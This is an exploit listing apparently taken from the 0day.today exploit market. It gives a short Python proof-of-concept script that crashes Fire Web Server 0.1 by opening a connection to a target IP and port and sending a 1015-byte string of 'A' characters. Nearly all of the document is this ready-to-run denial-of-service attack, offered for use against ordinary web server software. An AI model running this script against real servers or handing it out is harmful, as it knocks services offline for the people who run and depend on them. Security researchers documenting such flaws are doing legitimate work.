[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Fire Web Server 0.1 - Remote Denial of Service Exploit

Author
Saeed reza Zamanian
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-34639
Category
dos / poc
Date add
07-07-2020
Platform
windows
# Exploit Title: Fire Web Server 0.1 - Remote Denial of Service (PoC)
# Exploit Author: Saeed reza Zamanian
# Vendor Homepage: https://sourceforge.net/projects/firewebserver/
# Software Link: https://sourceforge.net/projects/firewebserver/files/
# Version: Pre-Alpha
# Tested on: Windows 7 , Windows Vista

#!/usr/bin/python
  
import socket,os,sys

if len(sys.argv) < 3:
	print "Usage: python fwspa_dos.py targetIP targetPort"
else:
	print "[*] Sending evil http request to target"
	expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
	expl.connect((sys.argv[1], int(sys.argv[2])))
	expl.send("A"*1015)	
	expl.close()

#  0day.today [2024-09-28]  #